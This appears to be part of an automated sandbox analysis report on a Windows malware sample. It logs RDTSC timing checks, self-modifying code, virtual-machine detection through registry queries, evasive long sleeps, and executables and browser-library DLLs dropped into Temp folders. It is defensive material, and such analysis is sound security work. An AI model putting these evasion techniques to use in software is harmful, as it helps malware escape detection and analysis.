Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0344 second address: 4DD0400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 call 00007F0154ED053Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F01C701E866h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F0154ED0545h 0x0000001b and esi, 7DBB7196h 0x00000021 jmp 00007F0154ED0541h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F0154ED0540h 0x0000002d sbb esi, 6EBF39B8h 0x00000033 jmp 00007F0154ED053Bh 0x00000038 popfd 0x00000039 popad 0x0000003a test byte ptr [esi+48h], 00000001h 0x0000003e pushad 0x0000003f mov edi, esi 0x00000041 pushfd 0x00000042 jmp 00007F0154ED0540h 0x00000047 adc ecx, 6A19F418h 0x0000004d jmp 00007F0154ED053Bh 0x00000052 popfd 0x00000053 popad 0x00000054 jne 00007F01C701E7FBh 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov esi, edi 0x0000005f call 00007F0154ED0547h 0x00000064 pop eax 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC089C second address: 4DC08B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC08B4 second address: 4DC08FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F0154ED0549h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F0154ED0549h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC08FF second address: 4DC0924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0154ECB87Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0924 second address: 4DC092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC092A second address: 4DC092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC092E second address: 4DC09AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0154ED0546h 0x0000000e xchg eax, esi 0x0000000f jmp 00007F0154ED0540h 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007F0154ED0540h 0x0000001c sub ebx, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F0154ED053Ah 0x00000027 sbb eax, 42D7D138h 0x0000002d jmp 00007F0154ED053Bh 0x00000032 popfd 0x00000033 call 00007F0154ED0548h 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC09AD second address: 4DC09DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0154ECB87Eh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0154ECB888h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC09DE second address: 4DC0A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F01C7025ED7h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, FAh 0x00000014 pushfd 0x00000015 jmp 00007F0154ED053Ch 0x0000001a xor ecx, 421F7F88h 0x00000020 jmp 00007F0154ED053Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0A18 second address: 4DC0A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F0154ECB87Eh 0x00000015 mov ecx, esi 0x00000017 jmp 00007F0154ECB880h 0x0000001c je 00007F01C70211BDh 0x00000022 jmp 00007F0154ECB880h 0x00000027 test byte ptr [76FA6968h], 00000002h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0A7E second address: 4DC0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0A85 second address: 4DC0AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F01C702118Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0AA9 second address: 4DC0AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 call 00007F0154ED0548h 0x0000000a mov esi, 1A406C11h 0x0000000f pop eax 0x00000010 popad 0x00000011 mov edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F0154ED053Dh 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F0154ED0543h 0x00000022 pop eax 0x00000023 mov ax, dx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0BE5 second address: 4DC0BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB87Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0BF7 second address: 4DC0BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0D88 second address: 4DD0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0D8C second address: 4DD0D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0D92 second address: 4DD0DC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bl, 2Bh 0x00000011 pushfd 0x00000012 jmp 00007F0154ECB87Eh 0x00000017 and eax, 7591F678h 0x0000001d jmp 00007F0154ECB87Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DC5 second address: 4DD0DE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DE9 second address: 4DD0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DED second address: 4DD0DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0A68 second address: 4DD0B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F0154ECB87Bh 0x0000000c and ax, D74Eh 0x00000011 jmp 00007F0154ECB889h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F0154ECB87Eh 0x00000020 push eax 0x00000021 pushad 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F0154ECB887h 0x00000029 xor cx, 820Eh 0x0000002e jmp 00007F0154ECB889h 0x00000033 popfd 0x00000034 mov esi, 3694DB17h 0x00000039 popad 0x0000003a mov ax, 11B3h 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 pushfd 0x00000044 jmp 00007F0154ECB882h 0x00000049 adc esi, 4229ABB8h 0x0000004f jmp 00007F0154ECB87Bh 0x00000054 popfd 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E50713 second address: 4E50719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E50719 second address: 4E5075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f pushfd 0x00000010 jmp 00007F0154ECB889h 0x00000015 and ch, 00000056h 0x00000018 jmp 00007F0154ECB881h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E5075F second address: 4E50792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0154ED0548h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E50792 second address: 4E50798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E4089D second address: 4E408A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E408A1 second address: 4E408A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E408A7 second address: 4E40941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0154ED0540h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F0154ED0541h 0x00000016 pushfd 0x00000017 jmp 00007F0154ED0540h 0x0000001c adc cl, 00000058h 0x0000001f jmp 00007F0154ED053Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 pushfd 0x00000027 jmp 00007F0154ED0549h 0x0000002c jmp 00007F0154ED053Bh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0154ED0545h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40941 second address: 4E4096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0154ECB887h 0x00000008 pop ecx 0x00000009 mov dx, 608Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E4096B second address: 4E4096F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E4096F second address: 4E40975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40711 second address: 4E40762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007F0154ED053Dh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0154ED053Ah 0x00000017 adc ecx, 61C0FD08h 0x0000001d jmp 00007F0154ED053Bh 0x00000022 popfd 0x00000023 mov ax, 277Fh 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0154ED0541h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40762 second address: 4E40772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB87Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40772 second address: 4E407A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bx, 3CB0h 0x0000000f mov bh, 73h 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0154ED053Dh 0x0000001c jmp 00007F0154ED053Bh 0x00000021 popfd 0x00000022 mov ah, 22h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE00C0 second address: 4DE0184 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0154ECB87Fh 0x0000000c sbb ax, 1C5Eh 0x00000011 jmp 00007F0154ECB889h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e mov edi, 2CC7396Ch 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 push ebx 0x00000027 mov eax, 6AB86CB3h 0x0000002c pop ecx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F0154ECB87Fh 0x00000034 and ch, 0000001Eh 0x00000037 jmp 00007F0154ECB889h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F0154ECB880h 0x00000043 xor ch, 00000018h 0x00000046 jmp 00007F0154ECB87Bh 0x0000004b popfd 0x0000004c popad 0x0000004d popad 0x0000004e mov ebp, esp 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 pushfd 0x00000054 jmp 00007F0154ECB882h 0x00000059 sbb si, 2F78h 0x0000005e jmp 00007F0154ECB87Bh 0x00000063 popfd 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40BEE second address: 4E40BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40BF2 second address: 4E40BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40BF8 second address: 4E40C10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40C10 second address: 4E40C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0154ECB883h 0x0000000a add eax, 38C33BEEh 0x00000010 jmp 00007F0154ECB889h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40C49 second address: 4E40C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED053Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40C59 second address: 4E40C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40C71 second address: 4E40C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40C75 second address: 4E40C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40C7B second address: 4E40CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 6Fh 0x0000000d pushfd 0x0000000e jmp 00007F0154ED0549h 0x00000013 add eax, 47D076E6h 0x00000019 jmp 00007F0154ED0541h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F0154ED053Eh 0x00000027 push dword ptr [ebp+0Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0154ED053Ah 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40CE4 second address: 4E40CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40CEA second address: 4E40D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0154ED053Ch 0x00000009 sbb ecx, 27A854E8h 0x0000000f jmp 00007F0154ED053Bh 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0154ED0541h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40D27 second address: 4E40D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 57973D53h 0x0000000e jmp 00007F0154ECB887h 0x00000013 xor dword ptr [esp], 57963D51h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40D65 second address: 4E40D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40D69 second address: 4E40D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40D6D second address: 4E40D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E40D73 second address: 4E40D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CFEB70 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EA8C13 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EA76A4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ED3FAD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EBBF24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: FAEB70 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 1158C13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 11576A4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 1183FAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 116BF24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Special instruction interceptor: First address: B41CD1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Special instruction interceptor: First address: B41DA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Special instruction interceptor: First address: CDEDCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Special instruction interceptor: First address: D606F1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Special instruction interceptor: First address: E4EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Special instruction interceptor: First address: E4EADD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Special instruction interceptor: First address: 1083F84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E8EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E8EADD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10C3F84 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04E40BDE rdtsc 0_2_04E40BDE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7796 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7768 Thread sleep count: 57 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7768 Thread sleep time: -114057s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep count: 316 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep time: -9480000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7872 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7788 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7788 Thread sleep time: -88044s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7780 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7780 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe TID: 7188 Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe TID: 7188 Thread sleep time: -276000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6432 Thread sleep count: 36 > 30
